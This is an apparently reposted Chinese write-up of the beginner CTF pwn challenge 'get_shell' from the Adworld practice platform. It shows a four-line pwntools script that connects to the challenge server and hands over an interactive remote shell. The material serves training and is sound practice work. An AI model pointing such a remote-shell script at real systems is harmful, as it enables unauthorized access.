PWN-攻防世界 get_shell - 走看看

zoukankan html css js c++ java

PWN-攻防世界 get_shell
get_shell

难度系数： 6.0
题目描述：运行就能拿到shell呢，真的
题目场景：
220.249.52.133:57808
题目附件：
链接：https://pan.baidu.com/s/13OAHCWRew06-jZINlvVUtA
提取码：eodj

鉴于这个难度的题，就直接拉入64位IDA了（如果是32位则会报错）

F5反汇编一下

够直接....
再一结合他的题目描述，可以的，没骗人

开始编写EXP啦
```
from pwn import *   #导入 pwntools 中 pwn 包的所有内容
r = remote("220.249.52.133","57808")  # 链接服务器远程交互
r.sendline()  # 将shellcode 发送到远程连接
r.interactive()  # 将控制权交给用户，这样就可以使用打开的shell了
```
运行，结束

flag乖乖出来啦~
flag就不打码了，没有什么必要
你做的每件事都值得。 ——yaerda
查看全文

相关阅读:
Eclipse使用xdoclet1.2.3 生成hibernate配置文件和映射文件
 Eclipse安装SVN插件
 SourceTree安装和使用
 myeclipse通过数据表生成jpa或hibernate实体
 Delphi 快速读取TXT 指定行的数据
 delphi中如何将一整个文件读入内存
 Delphi TextFile读取文本文件
 Delphi读取和写入utf-8编码格式的文件
 Delphi 判断特定字符是为单字节还是双字节
 delphi按字节长度分割字符串函数（转）

原文地址：https://www.cnblogs.com/XXX-Echoed/p/13298465.html

Copyright © 2011-2022 走看看